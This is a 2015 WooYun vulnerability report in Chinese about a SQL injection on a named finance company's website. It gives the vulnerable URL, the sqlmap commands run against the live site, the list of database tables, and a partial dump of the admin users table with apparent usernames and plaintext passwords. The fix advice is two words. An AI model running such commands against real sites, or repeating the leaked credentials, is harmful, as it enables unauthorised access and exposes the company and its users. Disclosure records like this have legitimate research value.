漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0145259
漏洞标题:安盛金融存在SQL注入漏洞直接暴库登录后台
相关厂商:安盛金融
漏洞作者: Eli0t
提交时间:2015-10-08 12:21
修复时间:2015-11-22 12:22
公开时间:2015-11-22 12:22
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:5
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-10-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-22: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
安盛金融存在SQL注入漏洞,直接暴库,登录后台
详细说明:
SQL注入点:
http://www.anshengcredit.com/about.php?id=35
Sqlmap -u http://www.anshengcredit.com/about.php?id=35 --tables
--dbms "MySQL" -D "asweb"
Database: asweb
[18 tables]
+-------------------+
| `leave-word` |
| `news-type` |
| `site-set` |
| apply |
| area |
| auth_code |
| banner |
| city |
| column |
| menu |
| news |
| news_img |
| product |
| provincial |
| resume |
| users |
| weixin_activities |
| wx_event_record |
+-------------------+
[root@Hacker~]# Sqlmap -u http://www.anshengcredit.com/about.php?id=35 --dump --
dbms "MySQL" -D "asweb" -T "users"
Database: asweb
Table: users
[3 entries]
+--------+-----------------------------+----------+----------+------------
------------------+
| UserID | Menus | UserName | RealName | Password
stLoginTime |
+--------+-----------------------------+----------+----------+------------
------------------+
[01:32:36] [WARNING] cannot properly display Unicode characters inside Win
S command prompt (http://bugs.python.org/issue1602). All unhandled occuran
ll result in replacement with '?' character. Please, find proper character
sentation inside corresponding output files.
| ?? | as4001581118 | 2014-07-18 00:00:00 |
| 4 | 4 | anan | anan | as888888
14-11-14 11:34:11 |
| 5 | 1,2,3,8,4,10,5,9,6 | lob | lobyan | qq632330
漏洞证明:
修复方案:
过滤~
排查其他~
版权声明:转载请注明来源 Eli0t@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝